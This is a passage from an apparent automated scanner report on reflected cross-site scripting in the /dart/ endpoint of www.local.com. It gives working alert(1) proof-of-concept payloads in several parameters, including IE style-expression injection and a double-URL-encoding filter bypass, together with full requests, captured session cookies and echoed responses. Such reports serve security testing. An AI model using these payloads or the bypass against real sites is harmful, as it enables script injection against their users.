           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

4.458. http://www.local.com/dart/ [l parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.459. http://www.local.com/dart/ [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

4.460. http://www.local.com/dart/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

4.461. http://www.local.com/dart/ [ord parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

4.462. http://www.local.com/dart/ [p parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.463. http://www.local.com/dart/ [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

4.464. http://www.local.com/dart/ [pos parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.465. http://www.local.com/dart/ [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

4.466. http://www.local.com/dart/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

